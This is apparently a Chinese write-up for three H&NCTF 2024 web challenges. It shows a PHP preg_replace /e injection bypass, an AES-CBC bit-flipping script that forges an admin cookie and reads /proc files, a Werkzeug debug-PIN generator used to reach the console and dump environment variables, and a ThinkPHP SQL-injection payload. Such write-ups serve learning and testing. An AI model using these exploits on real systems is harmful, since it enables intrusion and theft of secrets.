H&NCTF 2024 web(部分题目)

Please_RCE_Me 

 <?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";
} 

以上为题目源代码
str2在正则时没有区分大小写，直接改个大写字母就饶过了
利用函数var_dump(scandir(chr(47)));读取根目录

可以看出flag文件名字

str1可以使用函数readfile函数读取文件，利用getallheaders()以及利用end()函数将指针指向http请求最后一个字段，然后自己构造一个字段进行读取,例如 rxuxin:/flag

 通过这种方式就可以解出

flipPin

进入题目后，根据提示去看 /hint 页面，可以看出来源码

from flask import Flask, request, abort
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from flask import Flask, request, Response
from base64 import b64encode, b64decode

import json

default_session = '{"admin": 0, "username": "user1"}'
key = get_random_bytes(AES.block_size)


def encrypt(session):
    iv = get_random_bytes(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return b64encode(iv + cipher.encrypt(pad(session.encode('utf-8'), AES.block_size)))


def decrypt(session):
    raw = b64decode(session)
    cipher = AES.new(key, AES.MODE_CBC, raw[:AES.block_size])
    try:
        res = unpad(cipher.decrypt(raw[AES.block_size:]), AES.block_size).decode('utf-8')
        return res
    except Exception as e:
        print(e)

app = Flask(__name__)

filename_blacklist = {
    'self',
    'cgroup',
    'mountinfo',
    'env',
    'flag'
}

@app.route("/")
def index():
    session = request.cookies.get('session')
    if session is None:
        res = Response(
            "welcome to the FlipPIN server try request /hint to get the hint")
        res.set_cookie('session', encrypt(default_session).decode())
        return res
    else:
        return 'have a fun'

@app.route("/hint")
def hint():
    res = Response(open(__file__).read(), mimetype='text/plain')
    return res


@app.route("/read")
def file():

    session = request.cookies.get('session')
    if session is None:
        res = Response("you are not logged in")
        res.set_cookie('session', encrypt(default_session))
        return res
    else:
        plain_session = decrypt(session)
        if plain_session is None:
            return 'don\'t hack me'

        session_data = json.loads(plain_session)

        if session_data['admin'] :
            filename = request.args.get('filename')

            if any(blacklist_str in filename for blacklist_str in filename_blacklist):
                abort(403, description='Access to this file is forbidden.')

            try:
                with open(filename, 'r') as f:
                    return f.read()
            except FileNotFoundError:
                abort(404, description='File not found.')
            except Exception as e:
                abort(500, description=f'An error occurred: {str(e)}')
        else:
            return 'You are not an administrator'






if __name__ == "__main__":
    app.run(host="0.0.0.0", port=9091, debug=True)

 

然后一审计发现是AES-CBC字节反转攻击，然后附上脚本

import requests
from base64 import b64decode, b64encode

url = "http://hnctf.imxbt.cn:42281/"
default_session = '{"admin": 0, "username": "user1"}'
res = requests.get(url)
c = bytearray(b64decode(res.cookies["session"]))
c[default_session.index("0")] ^= 1
evil = b64encode(c).decode()

res = requests.get(url+f"read?filename=/proc/sys/kernel/random/boot_id", cookies={"session": evil})
print(res.text)

利用此脚本读取pin值构造条件（构造pin值的脚本如下，其中构造条件用注释写出）

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctfUser'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/lib/python3.9/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '116898694213790',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由两个合并(docker就后两个)：1./proc/sys/kernel/random/boot_id      2./proc/self/cgroup 由于cgroup和mountinfo被禁用,则用/proc/1/cpuset代替读取
    'd8c226fb-ceb1-4366-ad71-e8e995dc3065'+'2443c9a113a97939c2c4621d875e1fb540a17c79232c91439645ce3942ff6f3d'#  /proc/sys/kernel/random/boot_id + /proc/1/cpuset
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

计算出pin值后，在/console路由输入pin值，利用以下命令读取环境变量
>>>import os
>>>os.environ
就可以看到flag了

 ez_tp

emmmm这个题很难评，由于我下载附件比较早，可以根据日志文件直接梭哈
\ez_tp\App\Runtime\Logs\Home\ 在此目录下打开 24_04_17.log文件，然后直接输入框选的payload,就可以直接得出flag

home/index/h_n?name[0]=exp&name[1]=%3d%27test123%27%20union%20select%201,flag%20from%20flag